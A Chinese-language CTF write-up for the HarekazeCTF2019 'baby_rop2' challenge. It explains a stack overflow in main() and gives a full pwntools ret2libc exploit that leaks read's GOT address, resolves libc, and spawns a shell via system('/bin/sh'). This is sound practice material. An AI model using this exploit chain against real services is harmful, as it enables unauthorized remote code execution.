解题思路:
泄露或修改内存数据:
- 堆地址:无需
- 栈地址:无需
- libc地址:[[利用got表和plt表泄露数据]] printf
- BSS段地址:无需
劫持程序执行流程:[[ret2libc(栈溢出调用任意函数)]]
获得shell或flag:[[调用libc中的system]]
学到的知识:
[[LibcSearcher的使用]]
题目信息:
┌──(kali㉿kali)-[~/Desktop]
└─$ file _HarekazeCTF2019_baby_rop2
_HarekazeCTF2019_baby_rop2: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=fab931b976ae2ff40aa1f5d1926518a0a31a8fd7, not stripped
┌──(kali㉿kali)-[~/Desktop]
└─$ checksec --file=_HarekazeCTF2019_baby_rop2
\RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
Partial RELRO No canary found NX enabled No PIE No RPATH No RUNPATH 71) Symbols No 0 2 _HarekazeCTF2019_baby_rop2
libc版本:
wp借鉴:
核心伪代码分析:
存在利用的的代码:
int __cdecl main(int argc, const char **argv, const char **envp)
{
char buf[28]; // [rsp+0h] [rbp-20h] BYREF
int v5; // [rsp+1Ch] [rbp-4h]
setvbuf(stdout, 0LL, 2, 0LL);
setvbuf(stdin, 0LL, 2, 0LL);
printf("What's your name? ");
v5 = read(0, buf, 0x100uLL);
buf[v5 - 1] = 0;
printf("Welcome to the Pwn World again, %s!\n", buf);
return 0;
}
分析:
利用printf泄露函数地址,从而利用system函数。
调用printf函数需要两个参数,所以需要使用rdi和rsi两个寄存器!!!
但如果是单独泄露libc只需要一个寄存器rdi!
.rodata:0000000000400770
aWelcomeToThePw db 'Welcome to the Pwn World again, %s!',0Ah,0
调用其中的%s来输出函数地址。
rdi: format_str=0x400770
输出函数地址:
printf_got或者read_got
但泄露printf_got时无法泄露
/home/kali/Desktop/buuexp(_HarekazeCTF2019_baby_rop2).py:21: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
sh.recvuntil('\n')
[DEBUG] Received 0x51 bytes:
b'Welcome to the Pwn World again, aaaaaaaaaaaaaaaaaaaaaaaaaaaaI!\n'
b"What's your name? "
No matched libc, please add more libc or try others
所以泄露read的地址即可!!!
脚本:
from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='amd64',os='linux')
pwnfile='./_HarekazeCTF2019_baby_rop2'
sh=remote('node4.buuoj.cn',29604)
elf = ELF(pwnfile)
#sh=process(pwnfile)
pop_rdi = 0x400733
main_addr=elf.sym['main']
#payload=0x28*b'a'+p64(pop_rdi)+p64(elf.got['printf'])+p64(elf.plt['printf'])+p64(main_addr)
payload=0x28*b'a'+p64(pop_rdi)+p64(elf.got['read'])+p64(elf.plt['printf'])+p64(main_addr)
#gdb.attach(sh)
#pause()
sh.recvuntil("What's your name?")
sh.sendline(payload)
sh.recvuntil('\n')
read_addr = u64(sh.recv(6).ljust(8,b'\x00'))
libc=LibcSearcher('read',read_addr)
offset=read_addr-libc.dump('read')
system=offset+libc.dump('system')
bin_sh=offset+libc.dump('str_bin_sh')
print("read_addr:",hex(read_addr))
print("base_addr:",hex(offset))
print("bin_sh_addr:",hex(bin_sh))
print("system_addr:",hex(system))
'''
printf_addr = u64(sh.recv(6).ljust(8,b'\x00'))
libc=LibcSearcher('printf',printf_addr)
offset=printf_addr-libc.dump('printf')
system=offset+libc.dump('system')
bin_sh=offset+libc.dump('str_bin_sh')
print("printf:",hex(printf_addr))
print("base_addr:",hex(offset))
print("bin_sh_addr:",hex(bin_sh))
print("system_addr:",hex(system))
'''
payload1=0x28*b'a'+p64(pop_rdi)+p64(bin_sh)+p64(system)
sh.recvuntil("What's your name?")
sh.sendline(payload1)
sh.interactive()